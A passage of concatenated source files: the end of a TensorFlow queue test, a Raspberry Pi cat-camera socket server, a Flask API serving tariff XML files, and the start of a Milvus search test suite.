10, (dtypes_lib.float32, dtypes_lib.int32), ((), ()),
shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),)))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.PaddingFIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
q2 = data_flow_ops.PaddingFIFOQueue(15, dtypes_lib.float32, ((),))
enq_q = data_flow_ops.PaddingFIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(2, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8, dtypes_lib.int64,
dtypes_lib.bool, dtypes_lib.complex64, dtypes_lib.complex128
]
shape = (32, 4, 128)
q = data_flow_ops.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes_lib.bool:
np_array = np_array > 0
elif dtype in (dtypes_lib.complex64, dtypes_lib.complex128):
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = sess.run(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
data_flow_ops.PaddingFIFOQueue(32, [dtypes_lib.float32],
[tensor_shape.TensorShape(None)])
class QueueFromListTest(test.TestCase):
def testQueueFromListShapes(self):
which = constant_op.constant(1)
def _cmp(expected, *shapes):
qs = [
data_flow_ops.PaddingFIFOQueue(10, [dtypes_lib.float32],
[tensor_shape.TensorShape(s)])
for s in shapes
]
s_expected = tensor_shape.TensorShape(expected)
s = data_flow_ops.QueueBase.from_list(which, qs).shapes[0]
if s_expected.ndims is None:
self.assertEqual(s_expected.ndims, s.ndims)
else:
self.assertEqual(s_expected.as_list(), s.as_list())
_cmp(None, [1, None], [None])
_cmp([None], [1], [2])
_cmp([1, None], [1, 1], [1, 2])
_cmp([1, None], [1, 1], [1, None])
_cmp([None, None], [None, 1], [1, None])
_cmp([1], [1], [1], [1])
_cmp([None], [1], [None], [1])
_cmp(None, [1, None], [1], [1])
def testQueueFromListShapesMultipleComponents(self):
q_u_u = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([None]), tensor_shape.TensorShape([None])])
q_u_f = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([None]), tensor_shape.TensorShape([1, 2])])
q_f_f = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([3, 4]), tensor_shape.TensorShape([1, 2])])
which = constant_op.constant(1)
s_cmp_1 = data_flow_ops.QueueBase.from_list(which,
[q_u_u, q_u_u, q_u_u]).shapes
self.assertEqual([1, 1], [x.ndims for x in s_cmp_1])
self.assertEqual([None, None], [x.as_list()[0] for x in s_cmp_1])
s_cmp_2 = data_flow_ops.QueueBase.from_list(which,
[q_u_u, q_u_u, q_u_f]).shapes
self.assertEqual([1, None], [x.ndims for x in s_cmp_2])
self.assertEqual([None], s_cmp_2[0].as_list())
s_cmp_3 = data_flow_ops.QueueBase.from_list(which, [q_f_f, q_f_f]).shapes
self.assertEqual([2, 2], [x.ndims for x in s_cmp_3])
self.assertEqual([[3, 4], [1, 2]], [x.as_list() for x in s_cmp_3])
if __name__ == "__main__":
test.main()
|
server.py | #!/usr/bin/python3
import socket
import struct
import threading
import picamera
import camera
import time
import datetime
#TODO : need to redo following code
from pwm import Motors
from common import *
from debug import *
from comms_packet_structure import *
from external_processes import *
BUFFER_SIZE = 20
BUFFER_FILENAME = 'buffer.h264'
class KittyServer():
def __init__(self, ip, comms_port):
self.ip = ip
self.comms_port = comms_port
self.running = False
# Wrapper for the debug print call, with the server module as argument
def PRINT(self, string, level=0):
debugPrint(string, DEBUG_MODULE_SERVER, level)
# This actually does the initialization.
# initializes threads. the starting of them is done in run()
# After a disconnected client, one should terminateConnections,
# deinitialize, and initialize again.
def initialize(self):
self.commsServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.commsServer.bind((self.ip, self.comms_port))
# ServerRxThread and TxThread for the communication of commands, coordinates, etc.
self.serverRxThread = threading.Thread(target=self.ServerRxThread)
self.serverTxThread = threading.Thread(target=self.ServerTxThread)
self.connectionEstablished = False
self.clientConnection = {}
self.cameraX = 45
self.cameraY = 45
self.motors = Motors()
self.PRINT("Initialized")
# Joins threads, destroys camera and motor objects. Add anything else if you think of any
def deinitialize(self):
self.serverRxThread.join()
# self.serverTxThread.join()
del(self.motors)
self.PRINT("Deinitialized")
# This thread continuously receives data, passes to processInput
# TODO: Currently there's one size in receiving. have this
def ServerRxThread(self):
self.PRINT("Server Rx thread started")
rxBuf = []
while (self.connectionEstablished):
try:
rxData = self.clientConnection['commsConn'].recv(4)
rxBuf.extend(rxData)
print("Received data", [hex(i) for i in rxData])
# If we received the magic number, we can assume we have
# a full packet in our hands. process it.
if (rxData == bytes(COMMS_PACKET_MAGIC)):
self.processInput(rxBuf)
rxBuf = []
if (rxData == None or rxData == [] or len(rxData) == 0):
print("[!] rxData == None. Terminating connection")
self.terminateConnections()
except Exception as e:
print("[!] ERROR!")
print(e)
print("[!] TERMINATING CONNECTION")
self.terminateConnections()
self.PRINT("Server Rx thread ending")
def ServerTxThread(self):
pass
# Connect to client thru COMMS and then VIDEO connections.
# TODO: have this sequence be an exchange between the client and server.
# TODO: have some ssl key check trickery
def connectionSequence(self):
self.PRINT("Waiting for connection on port %s:%d" % (self.ip, self.comms_port))
self.commsServer.listen(1)
(conn, (ip, port)) = self.commsServer.accept()
self.clientConnection = {
"ip" : ip,
"commsConn": conn,
"videoConn": None,
"running" : False
}
self.PRINT("Comms port connection established with %s" % ip)
self.connectionEstablished = True
# TODO # add security measures before opening up video server
# OR just have a better secure handshake here
return True
# Terminate and close everything related to both VIDEO and COMMS connections/sockets
def terminateConnections(self):
if (self.clientConnection['commsConn'] != None):
self.clientConnection['commsConn'].close()
self.clientConnection['commsConn'] = None
self.clientConnection['running'] = False
self.connectionEstablished = False
self.PRINT('Connection with %s terminated' % self.clientConnection['ip'])
# Process commands received from the COMMS_CONNECTION
# Packet types defined in comms_packet_structure.py
def processInput(self, data):
decodedPacket = DecodeRawCommsPacket(bytes(data))
self.PRINT('Processed packet: ', decodedPacket)
if (decodedPacket['cmd_id'] == CommsPacketType.CMD_CAMERA_ANGLE_CHANGED.value):
payload = decodedPacket['payload'][0:2] # rest of the bytes are padding bytes
try:
newX, newY = struct.unpack('BB', payload)
except Exception as e:
print(e)
print(data)
return
if (newX < 0):
newX = 0
elif (newX > 180):
newX = 180
if (newY < 0):
newY = 0
elif (newY > 180):
newY = 180
self.motors.setX(newX)
self.motors.setY(newY)
self.PRINT("NEW X: %d, NEW Y: %d" % (newX, newY))
if (decodedPacket['cmd_id'] == CommsPacketType.CMD_START_RECORDING_VIDEO.value):
now = datetime.datetime.now()
filename = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
ret = EXT_runRaspicam(filename=filename, time_ms= 30 * 1000)
self.PRINT('RUNNING RASPICAM ret:', ret)
if (decodedPacket['cmd_id'] == CommsPacketType.CMD_STOP_RECORDING_VIDEO.value):
pass
if (decodedPacket['cmd_id'] == CommsPacketType.CMD_INITIATE_VIDEO_SERVER.value):
pass
# Main loop of the server program. The class itself doesnt jump to this function
def run(self):
self.running = True
self.PRINT("Starting kitty server")
# MAIN LOOP
while self.running:
self.initialize()
if (not self.connectionSequence()):
self.PRINT("[!] Connection sequence failed.")
self.deinitialize() # TODO make this prettier. we dont heed to deinit every time conn sequence fails
continue
# Start comms threads
self.serverRxThread.start()
#self.serverTxThread.start() # TODO # Eventually implement tx stuff
# Wait while we're connected to a client.
while self.clientConnection['running']:
pass
# When a disconnect occurs, deinitialize
self.deinitialize()
time.sleep(5)
self.PRINT("Shutting down server")
def main():
print("K i t t y S u r v e i l l a n c e - Server - v%s" % (VERSION))
server = KittyServer(SERVER_IP_ADDR, COMMS_IP_PORT)
server.run()
if __name__ == '__main__':
main()
|
taricapi.py | from gevent import monkey # noqa: E402 # pylint: disable=C0411, C0412, C0413
monkey.patch_all() # noqa: E402 # pylint: disable=C0411, C0413
import click
import datetime
import hashlib
import io
import json
from logging.config import dictConfig
import re
import signal
import sys
import threading
import uuid
from botocore.exceptions import ClientError
from elasticapm.contrib.flask import ElasticAPM
from flask import Flask, render_template, make_response, request, Response
from flask.logging import create_logger
from gevent.pywsgi import WSGIServer
import gevent
from lxml import etree
import requests
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from apifiles3 import write_file
from apifiles3 import remove_taric_file
from apifiles3 import remove_temp_taric_file
from apifiles3 import rename_taric_file
from apifiles3 import save_temp_taric_file
from apifiles3 import stream_taric_file
from apifiles3 import get_taric_index_file
from apifiles3 import get_taric_filepath
from apifiles3 import get_file_list
from apifiles3 import get_file_size
from apifiles3 import read_file
from apifiles3 import file_exists
from apifiles3 import md5
from apifiles3 import modification_date
from config import (
API_ROOT,
APIKEYS,
APIKEYS_UPLOAD,
PORT,
LOGGING,
NUM_PROXIES,
REQUIRE_AUTH_FOR_READS,
SENTRY_DSN,
ELASTIC_APM_TOKEN,
ELASTIC_APM_URL,
ENVIRONMENT,
GA_TRACKING_ID,
GA_ENDPOINT,
)
# Use apifile for file system, apifiles3 for AWS S3
dictConfig(LOGGING)
app = Flask(__name__, static_url_path="/static", static_folder="static")
logger = create_logger(app)
# -----------------------
# HTTP HEADERS / API KEYS
# -----------------------
def get_apikey(request):
apikey = ""
if request.headers.get("X-API-KEY", None):
apikey = request.headers.get("X-API-KEY")
logger.info("Api key is in header")
else:
logger.info("No api key in header")
return apikey
def get_remoteaddr(request):
if request.environ.get("HTTP_X_FORWARDED_FOR") is None:
logger.info("Remote addresses are %s", request.environ["REMOTE_ADDR"])
remoteaddrs = request.environ["REMOTE_ADDR"].split(",")
else:
logger.info("Remote addresses are %s", request.environ["HTTP_X_FORWARDED_FOR"])
remoteaddrs = request.environ["HTTP_X_FORWARDED_FOR"].split(",")
if len(remoteaddrs) > NUM_PROXIES:
logger.warning("Additional remote addresses stripped (possible spoofing)")
remoteaddrs = remoteaddrs[-NUM_PROXIES:]
return remoteaddrs
def in_apikeys(apikey):
hashed_apikey = hashlib.sha256(apikey.encode("ascii")).hexdigest()
return hashed_apikey in APIKEYS
def in_apikeys_upload(apikey):
hashed_apikey = hashlib.sha256(apikey.encode("ascii")).hexdigest()
return hashed_apikey in APIKEYS_UPLOAD
def is_auth(request):
if not REQUIRE_AUTH_FOR_READS:
return True
apikey = get_apikey(request)
return in_apikeys(apikey)
def is_auth_upload(request):
apikey = get_apikey(request)
return in_apikeys_upload(apikey)
# ---------------------------
# URL Parameter validation
# Dates as ISO8601 YYYY-MM-DD
# Files as YYSSSS
# ---------------------------
def is_valid_date(date):
return re.match(r"^\d{4}-\d\d-\d\d$", date)
def is_valid_datetime(date):
return re.match(r"^\d{4}-\d\d-\d\d(T\d\d:\d\d:\d\d(\.\d\d\d)?)?$", date)
def is_valid_seq(seq):
return re.match(r"^\d{6}$", seq)
def is_virus_checked(file):
# TODO
return True
def is_schema_validated(xmlfile):
logger.debug("VALIDATING %s", xmlfile)
xsd_doc = etree.parse("taric3.xsd")
xsd = etree.XMLSchema(xsd_doc)
try:
xml = etree.parse(io.BytesIO(read_file(xmlfile)))
except Exception: # pylint: disable=W0703
logger.info("Unable to parse file as XML")
return False
if not xsd.validate(xml):
logger.info("XML Failed validation")
logger.debug("%s", xsd.error_log)
else:
logger.info("XML validates against taric3 schema")
return xsd.validate(xml)
# ------------------
# Create index entry
# ------------------
def create_index_entry(seq):
index_entry = {
"id": int(seq),
"issue_date": modification_date(get_taric_filepath(seq)),
"url": API_ROOT + "taricfiles/" + seq,
"md5": md5(get_taric_filepath(seq)),
"size": get_file_size(get_taric_filepath(seq)),
}
return index_entry
# ----------------
# Google Analytics
# ----------------
def _send_to_google_analytics(
requester_ip, request_host, request_path, request_headers
):
logger.debug("Sending to Google Analytics %s: %s...", request_host, request_path)
requests.post(
GA_ENDPOINT,
data={
"v": "1",
"tid": GA_TRACKING_ID,
"cid": str(uuid.uuid4()),
"t": "pageview",
"uip": requester_ip,
"dh": request_host,
"dp": request_path,
"ds": "public-tariffs-api",
"dr": request_headers.get("referer", ""),
"ua": request_headers.get("user-agent", ""),
},
)
logger.info("sent to ga")
# --------------------------------
# Rebuild master file index (JSON)
# --------------------------------
def rebuild_index(nocheck):
if not file_exists(get_taric_index_file()) or nocheck:
logger.info("*** Rebuilding file index... ***")
all_deltas = []
files = get_file_list(None)
logger.info("%s", files)
for file in files:
# build entry for file just uploaded
# TODO (possibly) Add Metadata generation -> then could have api /taricfilemd/...
# TODO - combine with individual update_index..
f = file["Key"]
f = f[f.rindex("/") + 1 :] # remove folder prefix
logger.info("Found file %s", f)
if f.startswith("TEMP_"):
logger.info("Removing temporary file %s", f)
seq = f[5:-4] # remove TEMP_ file prefix and .xml extension
remove_temp_taric_file(seq)
else:
if is_valid_seq(f[:-4]): # ignore non taric files
seq = f[:-4] # remove .xml extension
all_deltas.append(create_index_entry(seq))
logger.debug("%s delta files listed after update", str(len(all_deltas)))
# persist updated index
all_deltass = json.dumps(all_deltas)
write_file(get_taric_index_file(), all_deltass)
logger.info("Index rebuild complete")
@app.route("/api/v1/rebuildindex", methods=["POST"])
def rebuild_index_controller():
if not is_auth_upload(request):
logger.info("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
logger.debug("Starting thread to rebuild index.")
threading.Thread(target=rebuild_index, args=[True]).start()
return Response("202 index is being rebuilt", status=202)
# -------------------------------
# Update master file index (JSON)
# -------------------------------
def update_index(seq):
all_deltas = json.loads(read_file(get_taric_index_file()))
logger.debug(
"%s delta files listed in %s", str(len(all_deltas)), get_taric_index_file()
)
# build entry for file just uploaded
# TODO (possibly) Add Metadata file generation -> then could have api /taricfilesmd/...
# if the file was overwritten, just update the index, else append
existing = [d for d in all_deltas if d["id"] == int(seq)]
if len(existing) > 0:
logger.info("File %s overwritten", seq)
i = 0
for d in all_deltas:
logger.debug("%s", d)
if d["id"] == int(seq):
all_deltas[i] = create_index_entry(seq)
i = i + 1
else:
all_deltas.append(create_index_entry(seq))
logger.debug("%s delta files listed after update", str(len(all_deltas)))
# persist updated index
all_deltass = json.dumps(all_deltas)
write_file(get_taric_index_file(), all_deltass)
# ---------------------------------------------
# index page - could be used for pings / checks
# ---------------------------------------------
@app.route("/check")
def check():
logger.debug("%s", request.headers)
logger.debug("%s", request.environ)
message = (
"Request from "
+ get_apikey(request)
+ " @ "
+ " ".join(get_remoteaddr(request))
)
return render_template("check.html", message=message)
@app.route("/healthcheck")
def healthcheck():
return Response(
"""
<?xml version="1.0" encoding="UTF-8"?>
<pingdom_http_custom_check>
<status>OK</status>
</pingdom_http_custom_check>
""",
status=200,
headers={
"Content-Type": "text/xml",
"Cache-Control": "no-cache, no-store, must-revalidate",
},
)
@app.route("/")
def hello():
return render_template("index.html")
# --------------------------------------------------------------------------------------------
# API to retrieve list of delta files (for a date or defaults to yesterday to get latest file)
# NB using today would provide files loaded today
# but no guarantee that the list may change (i.e. extend) later due to further files
# --------------------------------------------------------------------------------------------
@app.route("/api/v1/taricdeltas/<date>", methods=["GET"])
@app.route("/api/v1/taricdeltas/", defaults={"date": ""}, methods=["GET"])
@app.route("/api/v1/taricdeltas", defaults={"date": ""}, methods=["GET"])
def taricdeltas(date):
# Default to yesterday
if date == "" or date is None:
yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
date = yesterday.strftime("%Y-%m-%d")
logger.debug("defaulted date to %s", date)
if not is_valid_date(date):
logger.debug("date is invalid")
return Response("Bad request [invalid date] (400)", status=400)
if not is_auth(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
logger.debug("date is %s", date)
# All Taric files uploaded are stored in the index
# Find files that have the issue date the same as the requested date
# Output the response filtered by the date
all_deltas = json.loads(read_file(get_taric_index_file()))
logger.debug(
"%s delta files listed in %s", str(len(all_deltas)), get_taric_index_file()
)
deltas_on_date = [d for d in all_deltas if d["issue_date"].startswith(date)]
if len(deltas_on_date) == 0:
logger.debug("No delta files available for date %s", date)
return Response("404 Not found", status=404)
logger.debug("%s delta files for date %s", str(len(deltas_on_date)), date)
deltas_json = json.dumps(deltas_on_date)
r = make_response(deltas_json)
r.headers.set("Content-Type", "application/json")
return r
# -----------------------------------------
# API to retrieve contents of specific file
# -----------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["GET"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["GET"])
def taricfiles(seq):
if not is_auth(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
if not is_valid_seq(seq):
logger.debug("seq is invalid")
return Response("400 Bad request [invalid seq]", status=400)
body_generator = stream_taric_file(seq)
if body_generator is None:
logger.debug("Requested file not found %s", seq)
return Response("404 Taric file does not exist", status=404)
return Response(
body_generator,
mimetype="text/xml",
headers={"Content-Length": get_file_size(get_taric_filepath(seq))},
)
# -----------------------------------------
# API to remove contents of specific file
# -----------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["DELETE"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["DELETE"])
def taricfiles_delete(seq):
if not is_auth_upload(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
if not is_valid_seq(seq):
logger.debug("seq is invalid")
return Response("400 Bad request [invalid seq]", status=400)
logger.info("attempt to remove taric file %s", seq)
try:
remove_taric_file(seq)
except ClientError as e:
return Response("400 Error %s" % e["Error"]["Code"], status=200)
logger.debug("Starting thread to rebuild index.")
threading.Thread(target=rebuild_index, args=[True]).start()
return Response("200 OK File deleted, reindexing", status=200)
# --------------------------------------------------------------------
# API to upload new taric file
# File in the API is identified by seq regardless of it's source name
# File modification time can be set using ?modtime=yyyy-mm-ddThh:mm:ss
# --------------------------------------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["POST"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["POST"])
def taricfiles_upload(seq):
modtime = None
if not is_auth_upload(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
if not is_valid_seq(seq):
logger.debug("seq is invalid")
return Response("400 Bad request [invalid seq]", status=400)
if "file" not in request.files:
logger.debug("No file uploaded")
return Response("400 No file uploaded", status=400)
# file is that attached in the POST request
file = request.files["file"]
if not file or file.filename == "":
logger.debug("No file uploaded")
return Response("400 No file uploaded", status=400)
logger.debug("file uploaded is %s", file.filename)
if not request.args.get("modtime") is None:
if not is_valid_datetime(request.args.get("modtime")):
logger.debug(
"Invalid file modification timestamp specified %s",
request.args.get("modtime"),
)
return Response(
"400 Invalid file modification timestamp specified", status=400
)
else:
modtime = request.args.get("modtime")
logger.debug("file mod time is %s", modtime)
# Save the uploaded XML file as temporary
temp_file_name = save_temp_taric_file(file, seq)
# TODO - should virus check ..
if not is_virus_checked(file.read()):
logger.debug("File failed virus check")
remove_temp_taric_file(seq)
return Response("400 Failed virus check", status=400)
# Validate XML against XSD
if not is_schema_validated(temp_file_name):
logger.debug("File failed schema check")
remove_temp_taric_file(seq)
return Response("400 Failed schema check", status=400)
# Rename the temporary XML file and update the index - used by the deltas API
try:
rename_taric_file(seq, modtime)
update_index(seq)
except IOError as exc:
logger.error("Error saving file %s.xml: %s", seq, str(exc))
return Response("500 Error saving file", status=500)
return Response("200 OK File uploaded", status=200)
def get_server():
if SENTRY_DSN:
sentry_sdk.init(
dsn=SENTRY_DSN, integrations=[FlaskIntegration()],
)
@app.after_request
def add_x_robots(response): # pylint: disable=W0612
response.headers["X-Robots-Tag"] = "noindex, nofollow"
response.headers[
"Strict-Transport-Security"
] = "max-age=31536000; includeSubDomains"
if GA_TRACKING_ID:
gevent.spawn(
_send_to_google_analytics,
request.remote_addr,
request.host_url,
request.path,
request.headers,
)
return response
elastic_apm_url = ELASTIC_APM_URL
elastic_apm_secret_token = ELASTIC_APM_TOKEN
elastic_apm = (
{
"SERVICE_NAME": "public-tariffs-api",
"SECRET_TOKEN": elastic_apm_secret_token,
"SERVER_URL": elastic_apm_url,
"ENVIRONMENT": ENVIRONMENT,
}
if elastic_apm_url and elastic_apm_secret_token
else {}
)
if elastic_apm:
app.config["ELASTIC_APM"] = elastic_apm
ElasticAPM(app)
server = WSGIServer(("0.0.0.0", PORT), app, log=app.logger)
return server
@click.command()
def serve():
"""Run webserver.
"""
rebuild_index(False)
server = get_server()
# TODO - is this supposed to hook SIGTERM twice? - if so document why.
gevent.signal_handler(signal.SIGTERM, server.stop)
gevent.signal_handler(signal.SIGTERM, server.stop)
server.serve_forever()
gevent.get_hub().join()
@click.command()
def ls():
"""List delta, temporary and other files.
"""
for f in get_file_list():
# File identification logic taken from rebuild_index
if f.startswith("TEMP_"):
seq = f[5:-4] # remove TEMP_ file prefix and .xml extension
click.echo("TEMP {seq} {filename}".format(seq=seq, filename=f))
else:
if is_valid_seq(f[:-4]): # ignore non taric files
seq = f[:-4]
click.echo("DELTA {seq} {filename}".format(seq=seq, filename=f))
else:
click.echo("MISC {filename}".format(filename=f))
@click.command()
def index():
"""Rebuild file index."""
rebuild_index(False)
@click.command(help="Delta sequence number [6 digits].")
@click.argument("seq")
def rmdelta(seq):
"""Remove delta file for sequence.
"""
if not is_valid_seq(seq):
click.echo("{seq} digita should be 6 digit numbers.".format(seq=seq))
return
remove_taric_file(seq)
rebuild_index(False)
@click.group(no_args_is_help=False, invoke_without_command=True)
def cli():
if not sys.argv[1:]:
# For backwards compatibility, default is to run the webserver.
serve()
if __name__ == "__main__":
# Setup maintenance commands.
cli.add_command(rmdelta)
cli.add_command(ls)
cli.add_command(serve)
cli.add_command(index)
cli()
|
test_search.py | import time
import pdb
import copy
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from pymilvus import DataType
from utils import *
from constants import *
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, default_top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, default_top_k,
nq)
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
'''
Generate entities and add it in collection
'''
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_names is None:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
'''
Generate entities and add it in collection
'''
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_names is None:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_flat(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_flat_top_k(self, connect, collection, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = 16385
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
